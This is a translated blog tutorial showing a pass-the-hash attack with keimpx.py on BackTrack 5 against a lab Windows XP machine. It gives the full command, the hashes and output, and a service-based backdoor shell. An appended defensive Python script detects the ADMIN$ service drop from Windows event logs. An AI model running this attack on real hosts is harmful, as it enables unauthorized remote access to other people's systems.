
Hash injection with keimpx.py on BT5

Source: 自学PHP网    Date: 2015-04-17 13:03


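The test target is a Windows XP machine, IP 192.168.1.5. Because it is not a domain-joined machine, I first turned off the firewall and disabled simple file sharing (My Documents -> Tools -> Folder Options -> View -> uncheck "Use simple file sharing").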
 
Run the command:
 
root@bt:/pentest/passwords/keimpx# ./keimpx.py -t 192.168.1.5 -v 1 -p 445 -U iishelp --nt=ccf9155e3e7db453aad3b435b51404ee --lm=3dbde697d71690a769204beb12283678
 
Output (the red text below marks the choices you are prompted for and the commands I typed):
 
 
This product includes software developed by CORE Security Technologies
 
(http://www.coresecurity.com), Python Impacket library
 
 
 
    keimpx 0.2
 
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
 
   
 
[13:46:20] [INFO] Loading targets
 
[13:46:20] [INFO] Loading credentials
 
[13:46:20] [INFO] Loading domains
 
[13:46:20] [INFO] Loaded 1 unique targets
 
[13:46:20] [INFO] Loaded 1 unique credentials
 
[13:46:20] [INFO] No domains specified, using NULL domain
 
[13:46:20] [INFO] Attacking host 192.168.1.5:445
 
[13:46:20] [INFO] Valid credentials on 192.168.1.5:445: iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
 
[13:46:20] [INFO] Attack on host 192.168.1.5:445 finished
 
 
The credentials worked in total 1 times
 
 
 
TARGET SORTED RESULTS:
 
 
 
192.168.1.5:445
 
  iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
 
 
 
 
 
USER SORTED RESULTS:
 
 
 
iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
 
  192.168.1.5:445
 
 
 
Do you want to get a shell from any of the targets? [Y/n]
 
Which target do you want to connect to?
 
[1] 192.168.1.5:445
 
> 1
 
Which credentials do you want to use to connect?
 
[1] iishelp/3dbde697d71690a769204beb12283678:ccf9155e3e7db453aad3b435b51404ee
 
> 1
 
[13:46:35] [INFO] type 'help' for help menu
 
# help
 
Generic options
 
===============
 
help - show this message
 
verbosity {level} - set verbosity level (0-2)
 
info - list system information
 
exit - terminates the SMB session and exit from the tool
 
 
 
Shares options
 
==============
 
shares - list available shares
 
use {sharename} - connect to an specific share
 
cd {path} - changes the current directory to {path}
 
pwd - shows current remote directory
 
ls {path} - lists all the files in the current directory
 
cat {file} - display content of the selected file
 
download {filename} - downloads the filename from the current path
 
upload {filename} - uploads the filename into the current path
 
mkdir {dirname} - creates the directory under the current path
 
rm {file} - removes the selected file
 
rmdir {dirname} - removes the directory under the current path
 
 
 
Services options
 
================
 
deploy {service name} {local file} [service args] - deploy remotely a service executable
 
undeploy {service name} {remote file} - undeploy remotely a service executable
 
 
 
Shell options
 
=============
 
shell [port] - spawn a shell listening on a TCP port, by default 2090/tcp
 
 
 
Users options
 
=============
 
users [domain] - list users, optionally for a specific domain
 
pswpolicy [domain] - list password policy, optionally for a specific domain
 
domains - list domains to which the system is part of
 
 
 
Registry options (Soon)
 
================
 
regread {registry key} - read a registry key
 
regwrite {registry key} {registry value} - add a value to a registry key
 
regdelete {registry key} - delete a registry key
 
 
 
# shell
 
[13:47:09] [INFO] Uploading the service executable to 'ADMIN$\urakxn.exe'
 
[13:47:09] [INFO] Connecting to the SVCCTL named pipe
 
[13:47:09] [INFO] Creating the service 'Ynohkb'
 
[13:47:09] [INFO] Starting the service 'Ynohkb'
 
[13:47:09] [INFO] Connecting to backdoor on port 2090, wait..
 
Microsoft Windows XP [\ufffd\u6c7e 5.1.2600]
 
(C) \ufffd\ufffd\u0228\ufffd\ufffd\ufffd\ufffd 1985-2001 Microsoft Corp.
 
 
 
C:\WINDOWS\system32>
 
Excerpted from vbs小铺
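
A defender's view of the `shell` step in the transcript above, as an added example that is not part of the original post or of keimpx: the tool writes an executable to ADMIN$ and immediately registers it as a service, and the code below correlates that sequence from Windows events 5145 (share file access), 7045 (service installed) and 4624 (logon). The events, the host name WS01, the source IP 192.168.1.9 and the 60-second window are constructed assumptions, and these event IDs exist on later Windows versions than the XP target used in the post.

```python
import ntpath
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=60)  # assumed correlation window

# Constructed sample events (not real logs); field names follow Windows
# Security events 4624/5145 and System event 7045.
EVENTS = [
    {"id": 4624, "time": "2015-04-17T13:47:08", "host": "WS01", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.1.9",
     "TargetUserName": "iishelp"},
    {"id": 5145, "time": "2015-04-17T13:47:09", "host": "WS01",
     "ShareName": r"\\*\ADMIN$", "RelativeTargetName": "urakxn.exe",
     "IpAddress": "192.168.1.9"},
    {"id": 7045, "time": "2015-04-17T13:47:09", "host": "WS01",
     "ServiceName": "Ynohkb", "ImagePath": r"%SystemRoot%\urakxn.exe"},
    # Benign: service installed locally, no preceding ADMIN$ write
    {"id": 7045, "time": "2015-04-17T14:10:00", "host": "WS01",
     "ServiceName": "UpdaterSvc", "ImagePath": r"C:\Program Files\Upd\upd.exe"},
]

def find_remote_service_drops(events, window=WINDOW):
    """Alert when an .exe written to ADMIN$ becomes a service on that host within `window`."""
    alerts = []
    evs = sorted(events, key=lambda e: e["time"])  # ISO timestamps sort as strings
    for svc in (e for e in evs if e["id"] == 7045):
        t_svc = datetime.fromisoformat(svc["time"])
        image = svc["ImagePath"].lower()  # may carry quotes or service arguments
        for w in evs:
            if w["id"] != 5145 or w["host"] != svc["host"]:
                continue
            dt = t_svc - datetime.fromisoformat(w["time"])
            dropped = ntpath.basename(w["RelativeTargetName"]).lower()
            if (timedelta(0) <= dt <= window and w["ShareName"].upper().endswith("ADMIN$")
                    and dropped.endswith(".exe") and dropped in image):
                # Attribute the write to an NTLM network logon from the same source, if logged
                logon = next((l for l in evs if l["id"] == 4624 and l["host"] == w["host"]
                              and l["LogonType"] == 3 and l["IpAddress"] == w["IpAddress"]
                              and l["AuthenticationPackageName"] == "NTLM"
                              and l["time"] <= w["time"]), None)
                alerts.append({"host": svc["host"], "service": svc["ServiceName"],
                               "file": dropped, "source": w["IpAddress"],
                               "user": logon["TargetUserName"] if logon else None})
    return alerts

if __name__ == "__main__":
    for alert in find_remote_service_drops(EVENTS):
        print(alert)
```

Event 5145 is only recorded when the "Detailed File Share" audit subcategory is enabled, so the correlation depends on that audit policy being turned on.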
